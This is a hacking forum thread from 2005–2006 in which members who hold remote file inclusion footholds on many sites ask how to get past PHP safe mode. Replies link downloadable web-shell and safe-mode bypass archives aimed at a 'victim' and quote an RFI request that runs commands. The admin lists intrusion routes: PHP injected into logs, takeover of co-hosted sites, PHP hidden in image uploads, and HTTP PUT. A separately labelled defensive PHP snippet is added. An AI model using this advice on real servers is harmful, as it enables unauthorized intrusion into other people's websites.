Safemode in PHP

Posted: Thu Mar 17, 2005 8:07 pm
zer0-c00l | Advanced user | Joined: Jun 25, 2004 | Posts: 72 | Location: BRAZIL!

Hi there...
I got many sites with remote file inclusion and they have safemode in PHP...

Does somebody know how to 'bypass' it, or another method to execute commands with safemode enabled?

Re: Safemode in PHP

Posted: Fri Mar 18, 2005 7:47 am
LINUX | Moderator | Joined: May 24, 2004 | Posts: 404 | Location: Caiman

zer0-c00l wrote: | Hi there...
I got many sites with remote file inclusion and they have safemode in PHP...

Does somebody know how to 'bypass' it, or another method to execute commands with safemode enabled?
|

Yes, here: http://www.sosvulnerable.net/waraxe/php-shells.rar bypass safemode tool25, you need to configure the rules for the full path of your victim

and upload all files, click in list on and safemode OWNED

Posted: Fri Mar 18, 2005 8:25 pm
zer0-c00l | Advanced user | Joined: Jun 25, 2004 | Posts: 72 | Location: BRAZIL!

There are a lot of files in the .rar :S
Can you tell me what I have to do to use it?

Maybe an example?

Thanks

Posted: Sat Mar 19, 2005 1:06 pm
y3dips | Valuable expert | Joined: Feb 25, 2005 | Posts: 281 | Location: Indonesia

zer0-c00l wrote: | There are a lot of files in the .rar :S
Can you tell me what I have to do to use it?

Maybe an example?

Thanks
|

Read the manual,
it is written clearly there

---//snip---
file :readme.txt

Php shells for use remote and local   for local rename*.php - for remote rename *.svs not php
 (svs = sosvulnerable security) xD ----\\snip

_________________
IO::y3dips->new(http://clog.ammar.web.id);

Posted: Sat Apr 02, 2005 4:37 pm
yame | Beginner | Joined: Apr 02, 2005 | Posts: 1

Hey,
I get this a lot of times while testing a remote file inclusion bug (I even used the tool25.doc error.php?dir=..../tool25.doc?&cmd=uname%20-a)

Quote: | Warning: main(): URL file-access is disabled in the server configuration in /home/.../error.php on line 1
|

Is this also because of Safemode, or is it something else?
How can someone bypass this?

Regards

Posted: Sat Apr 02, 2005 6:50 pm
murdock | Advanced user | Joined: Mar 16, 2005 | Posts: 54

Perhaps it has the option "allow_url_fopen" disabled in php.ini!

Posted: Sun Apr 03, 2005 10:14 am
y3dips | Valuable expert | Joined: Feb 25, 2005 | Posts: 281 | Location: Indonesia

yame wrote: | Hey,
I get this a lot of times while testing a remote file inclusion bug (I even used the tool25.doc error.php?dir=..../tool25.doc?&cmd=uname%20-a)

Quote: | Warning: main(): URL file-access is disabled in the server configuration in /home/.../error.php on line 1
|

Is this also because of Safemode, or is it something else?
How can someone bypass this?

Regards
|

SAFEMODE restricts these functions:
 dbmopen()
 dbase_open()
 filepro()
 filepro_rowcount()
 filepro_retrieve()
 ifx_*()
 ingres_*()
 mysql_*()
 pg_loimport()
 posix_mkfifo()
 putenv()
 move_uploaded_file()
 chdir()
 dl()
 shell_exec()
 exec()
 system()
 passthru()
 popen()
 mkdir()
 rmdir()
 rename()
 unlink()
 copy()
 chgrp()
 chown()
 chmod()
 touch()
 symlink()
 link()
 getallheaders()
 header()
 PHP_AUTH variables
 highlight_file()
 Show_source()
 parse_ini_file()
 set_time_limit()
 max_execution_time
 
... for more info read the PHP manual
I suggest you read the .chm form

_________________
IO::y3dips->new(http://clog.ammar.web.id);

Posted: Sun Apr 03, 2005 1:13 pm
waraxe | Site admin | Joined: May 11, 2004 | Posts: 2407 | Location: Estonia, Tartu

yame wrote: | Hey,
I get this a lot of times while testing a remote file inclusion bug (I even used the tool25.doc error.php?dir=..../tool25.doc?&cmd=uname%20-a)

Quote: | Warning: main(): URL file-access is disabled in the server configuration in /home/.../error.php on line 1
|

Is this also because of Safemode, or is it something else?
How can someone bypass this?

Regards
|

Like murdock already mentioned, it is the "allow_url_fopen" setting in php.ini, which will restrict remote inclusion possibilities, not the safe mode. So what to do and how to bypass? Some possible choices:

1. Using local files, for example some log files (if you can inject php code there)
2. If the server is a virtual server and there are many websites on the same IP address (most of the hosting works that way), you can try to take over some other site on the same server and then use directory traversal between virtual site root directories.
3. Pictures upload - all the image galleries and avatars and stuff - there is a possibility to craft some valid jpg/gif/png/bmp picture, which will pass through all the checking routines and still it will contain some php code inside.
 I have tested this on my local server and it seems that the php parser is very sensitive about this kind of php code inclusion. But try to experiment with a hex editor and finally it will work
4. Test apache/iis server directories against the "PUT" http method.

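The defender's side of the settings discussed in this thread, as an added example that is not part of any post or of the tools mentioned: a parameter-driven include (like the error.php?dir= pattern quoted above) rewritten so the request value only selects a key from a fixed map, together with a check of the URL-wrapper directives. PAGES, resolve_page(), url_wrapper_settings() and all file names are hypothetical.

```php
<?php
// Added example, not code from the thread. PAGES, resolve_page() and
// url_wrapper_settings() are hypothetical names; file names are constructed.

const PAGES = ['home' => 'home.php', 'error' => 'error_body.php'];

// The request value selects a key from a fixed map and never becomes a path.
function resolve_page(string $key, string $baseDir): ?string
{
    if (!array_key_exists($key, PAGES)) {
        return null; // URLs, ../ sequences, log and upload paths all end here
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . '/' . PAGES[$key]);
    if ($base === false || $path === false) {
        return null; // directory or mapped file does not exist
    }
    // realpath() resolves symlinks; the result must still sit under $base.
    return strpos($path, $base . DIRECTORY_SEPARATOR) === 0 ? $path : null;
}

// State of the two directives that control URL wrappers in fopen/include.
function url_wrapper_settings(): array
{
    $state = [];
    foreach (['allow_url_fopen', 'allow_url_include'] as $name) {
        $raw = ini_get($name); // false when the directive is unknown
        $state[$name] = $raw === false ? 'n/a'
            : (filter_var($raw, FILTER_VALIDATE_BOOLEAN) ? 'on' : 'off');
    }
    return $state;
}

// Constructed demo: a throwaway page directory and sample request values.
$dir = sys_get_temp_dir() . '/pages_' . bin2hex(random_bytes(4));
mkdir($dir);
file_put_contents($dir . '/home.php', "<?php echo 'home';\n");

$samples = ['home', 'error', 'http://example.invalid/x.txt?',
            '../../logs/access_log', 'uploads/avatar.gif'];
foreach ($samples as $value) {
    $target = resolve_page($value, $dir);
    printf("%-32s %s\n", $value,
        $target === null ? 'rejected' : 'include ' . basename($target));
}
print_r(url_wrapper_settings());

unlink($dir . '/home.php');
rmdir($dir);
```

Safe mode itself was removed in PHP 5.4, so on current PHP versions it is no longer a setting that can be relied on or audited.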

Posted: Sun Apr 03, 2005 4:13 pm
LINUX | Moderator | Joined: May 24, 2004 | Posts: 404 | Location: Caiman

Posted: Sun Apr 03, 2005 9:33 pm
sp3x | Valuable expert | Joined: Feb 15, 2005 | Posts: 10

Posted: Mon Apr 04, 2005 6:08 am
LINUX | Moderator | Joined: May 24, 2004 | Posts: 404 | Location: Caiman

Posted: Thu Mar 23, 2006 1:07 pm
Classics | Regular user | Joined: Mar 23, 2006 | Posts: 6 | Location: Nederland/Venlo

Hi
I have the same problems too, I use C99 Shell and RuSH Shell!

These shells are very mighty, but not incredibly enough.

Please upload your safemode tool again, the old link is 404 not found.

Thank you

Posted: Thu Mar 23, 2006 1:10 pm
waraxe | Site admin | Joined: May 11, 2004 | Posts: 2407 | Location: Estonia, Tartu

Classics wrote: | Hi
I have the same problems too, I use C99 Shell and RuSH Shell!

These shells are very mighty, but not incredibly enough.

Please upload your safemode tool again, the old link is 404 not found.

Thank you
|

Linux has changed his domain, here is new url:

http://www.securityhead.com/waraxe/php-shells.rar

Re: Safemode in PHP

Posted: Thu Apr 20, 2006 5:31 am
daemon_azazel | Regular user | Joined: Apr 16, 2006 | Posts: 17

LINUX wrote: | bypass safemode tool25, you need to configure the rules for the full path of your victim

and upload all files, click in list on and safemode OWNED
|

I have re-configured and uploaded it on a linux server with safemode on
and with open basedir restrictions on all other folders and the tool
did not work - it wasn't able to execute any command or list
anything.

Posted: Sun Apr 23, 2006 7:40 pm
outlawsys | Regular user | Joined: Jun 11, 2005 | Posts: 12

You can bypass safemode with a .cgi script so you can execute commands.